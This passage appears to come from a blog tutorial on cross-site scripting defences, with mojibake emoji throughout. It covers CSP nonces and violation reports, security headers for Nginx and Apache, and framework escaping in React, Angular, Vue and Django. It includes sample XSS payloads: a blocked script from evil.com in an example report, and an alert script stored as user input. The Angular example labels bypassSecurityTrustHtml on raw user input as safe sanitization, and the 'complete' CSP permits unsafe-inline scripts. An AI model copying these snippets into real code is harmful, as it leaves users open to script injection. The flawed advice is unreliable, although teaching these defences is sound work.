โโโ Prevents site from being framed (X-Frame-Options)Implementing CSP with Nonces:
<!-- ๐ฏ Server generates unique nonce each request -->
<?php
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: script-src 'self' 'nonce-$nonce'");
?><!-- ๐ก๏ธ Only scripts with correct nonce execute -->
<script nonce="<?= $nonce ?>">
// This script will execute
console.log('Trusted script');
</script>
<script>
// This script will NOT execute
alert('Blocked by CSP!');
</script>
<!-- ๐ฏR Inline styleswith nonce -->
<style nonce="<?= $nonce ?>">
body { color: #333; }
</style>
CSP Reporting:
๐ MONITORING CSP VIOLATIONS:
Content-Security-Policy:
default-src 'self';
report-uri /csp-violation-report-endpoint;
report-to csp-endpoint;
Content-Security-Policy-Report-Only:
default-src 'self';
script-src 'self';
report-uri /csp-report;
๐ฏ VIOLATION REPORT EXAMPLE:
{
"csp-report": {
"document-uri": "https://example.com/page",
"referrer": "https://google.com",
"violated-directive": "script-src",
"effective-directive": "script-src",
"original-policy": "script-src 'self'",
"blocked-uri": "https://evil.com/xss.js",
"line-number": 25,
"column-number": 10,
"source-file": "https://example.com/page",
"status-code": 200,
"script-sample": "alert(1)"
}
}3๏ธโฃ ๐ SECURITY HEADERS
๐ฏ DEFENSE-IN-DEPTH WITH HTTP HEADERS:
1๏ธโฃ X-Frame-Options: DENY
โโโ Prevents clickjacking
โโโ Options: DENY, SAMEORIGIN, ALLOW-FROM uri
2๏ธโฃ X-Content-Type-Options: nosniff
โโโ Prevents MIME type sniffing
โโโ Forces browser to respect declared content types
3๏ธโฃ X-XSS-Protection: 0
โโโ Disables browser's built-in XSS filter
โโโ Modern approach: Rely on CSP instead
4๏ธโฃ Referrer-Policy: strict-origin-when-cross-origin
โโโ Controls referrer information in requests
5๏ธโฃ Strict-Transport-Security (HSTS): max-age=31536000; includeSubDomains
โโโ Forces HTTPS connections
6๏ธโฃ Feature-Policy: camera 'none'; microphone 'none'
โโโ Controls browser feature usageComplete Security Headers Configuration:
# ๐ก๏ธ Nginx Configuration
server {
add_header X-Frame-Options "DENY" always;
add_header X-Content-Type-Options "nosniff" always;
add_header X-XSS-Protection "0" always;
add_header Referrer-Policy "strict-origin-when-cross-origin" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
add_header Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-src 'none'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none';" always;
add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;
}
# ๐ก๏ธ Apache .htaccess Configuration
<IfModule mod_headers.c>
Header set X-Frame-Options "DENY"
Header set X-Content-Type-Options "nosniff"
Header set X-XSS-Protection "0"
Header set Referrer-Policy "strict-origin-when-cross-origin"
Header set Strict-Transport-Security "max-age=31536000; includeSubDomains"
Header set Content-Security-Policy "default-src 'self'; script-src 'self' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self'; connect-src 'self'; frame-src 'none'; object-src 'none'; base-uri 'self'; form-action 'self'; frame-ancestors 'none';"
Header set Permissions-Policy "camera=(), microphone=(), geolocation=()"
</IfModule>4๏ธโฃ ๐ ๏ธ FRAMEWORK SECURITY FEATURES
React (Auto-escaping by default):
// ๐ก๏ธ React automatically escapes content
function SafeComponent({ userInput }) {
return (
<div>
{/* โ
Auto-escaped: Safe */}
<p>{userInput}</p>
{/* โ ๏ธ Dangerous: Only use with trusted content */}
<div dangerouslySetInnerHTML={{ __html: userInput }} />
{/* โ
Sanitize before using dangerouslySetInnerHTML */}
<div dangerouslySetInnerHTML={{
__html: DOMPurify.sanitize(userInput)
}} />
</div>
);
}Angular (Built-in sanitization):
// ๐ก๏ธ Angular has built-in security
import { DomSanitizer } from '@angular/platform-browser';
@Component({
template: `
<!-- โ
Auto-sanitized -->
<div [innerHTML]="safeHTML"></div>
<!-- โ
Explicit sanitization -->
<div [innerHTML]="getSafeHTML(userInput)"></div>
`
})
export class SafeComponent {
constructor(private sanitizer: DomSanitizer) {}
getSafeHTML(input: string) {
return this.sanitizer.bypassSecurityTrustHtml(input);
// โ ๏ธ Only bypass if you've manually sanitized!
}
}Vue.js (Auto-escaping):
<template>
<!-- โ
Auto-escaped -->
<p>{{ userInput }}</p>
<!-- โ ๏ธ Dangerous -->
<div v-html="userInput"></div>
<!-- โ
Safe with sanitization -->
<div v-html="sanitizedInput"></div>
</template>
<script>
import DOMPurify from 'dompurify';
export default {
data() {
return {
userInput: '<script>alert("XSS")</script>'
};
},
computed: {
sanitizedInput() {
return DOMPurify.sanitize(this.userInput);
}
}
};
</script>Django (Template auto-escaping):
# ๐ก๏ธ Django templates auto-escape by default
from django.utils.html import escape
from django.utils.safestring import mark_safe
def safe_view(request):
user_input = request.GET.get('input', '')
# โ
Auto-escaped in templates
context = {
'user_input': user_input, # Auto-escaped
'safe_html': mark_safe('<b>Trusted HTML</b>') # โ ๏ธ Mark as safe
}
return render(request, 'template.html', context)
# In template.html:
# {{ user_input }} โ Auto-escaped
# {{ safe_html|safe }} โ Rendered as HTML (only if trusted!)๐ If this helped you โ clap it up (you can clap up to 50 times!)
๐ Follow for more writeups โ dropping soon
๐ Share with your pentest team
๐ฌ Drop a comment